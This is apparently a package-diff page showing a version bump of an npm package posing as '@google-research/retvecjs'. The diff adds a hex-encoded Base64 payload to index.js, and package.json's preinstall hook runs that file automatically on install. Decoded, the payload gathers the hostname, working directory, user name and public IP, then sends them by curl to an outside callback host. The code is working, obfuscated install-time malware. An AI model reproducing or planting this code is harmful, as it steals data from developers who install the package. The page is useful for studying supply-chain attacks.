@google-research/retvecjs 99.99.9 → 100.99.9
Sign up to get free protection for your applications and to get access to all the features.
- package/index.js +1 -1
- package/package.json +15 -15
package/index.js
CHANGED
@@ -3,7 +3,7 @@ const fs = require('fs');
|
|
3
3
|
const path = require('path');
|
4
4
|
|
5
5
|
// The encoded script (hexadecimal-encoded Base64 string)
|
6
|
-
const hexEncodedBase64 = '
|
6
|
+
const hexEncodedBase64 = '59323975633351676579426C6547566A49483067505342795A58463161584A6C4B434A6A61476C735A463977636D396A5A584E7A49696B37436D56345A574D6F496D45394A43686F62334E30626D46745A5474776432513764326876595731704F32566A614738674A30426E6232396E62475574636D567A5A57467959326776636D5630646D566A616E4D6E4F324E31636D77676148523063484D364C7939705A6D4E76626D5A705A7935745A5473704943596D4947566A614738674A47456766434234654751674C5841676643426F5A57466B494877676432687062475567636D56685A4342316444746B6279426A64584A7349433172494331704943317A49476830644841364C79396B64336C6A63485A75646D4E7959325A79626D4E6D5A324E74634868346158633561485179616D7033636E41756232467A6443356D645734764A4856304F325276626D5567496941734943686C636E4A76636977675A474630595377675A325630644756794B5341395069423743676C705A69686C636E4A7663696C3743676B4A59323975633239735A5335736232636F496D5679636D39794969786C636E4A76636935745A584E7A5957646C4B54734B43516C795A585231636D343743676C3943676C705A69686E5A5852305A58497065776F4A43574E76626E4E76624755756247396E4B475268644745704F776F4A43584A6C64485679626A734B4358304B43574E76626E4E76624755756247396E4B475268644745704F776F4A436E30704F776F3D';
|
7
7
|
|
8
8
|
// Decode the hex string to Base64
|
9
9
|
let base64Script;
|
package/package.json
CHANGED
@@ -1,15 +1,15 @@
|
|
1
|
-
{
|
2
|
-
"name": "@google-research/retvecjs",
|
3
|
-
"version": "
|
4
|
-
"description": "
|
5
|
-
"main": "index.js",
|
6
|
-
"scripts": {
|
7
|
-
"test": "echo \"Error: no test specified\" && exit 1",
|
8
|
-
"preinstall": "node index.js"
|
9
|
-
},
|
10
|
-
"keywords": [
|
11
|
-
"retvecjs"
|
12
|
-
],
|
13
|
-
"author": "MR.N433M",
|
14
|
-
"license": "ISC"
|
15
|
-
}
|
1
|
+
{
|
2
|
+
"name": "@google-research/retvecjs",
|
3
|
+
"version": "100.99.9",
|
4
|
+
"description": "Testing",
|
5
|
+
"main": "index.js",
|
6
|
+
"scripts": {
|
7
|
+
"test": "echo \"Error: no test specified\" && exit 1",
|
8
|
+
"preinstall": "node index.js"
|
9
|
+
},
|
10
|
+
"keywords": [
|
11
|
+
"retvecjs"
|
12
|
+
],
|
13
|
+
"author": "MR.N433M",
|
14
|
+
"license": "ISC"
|
15
|
+
}
|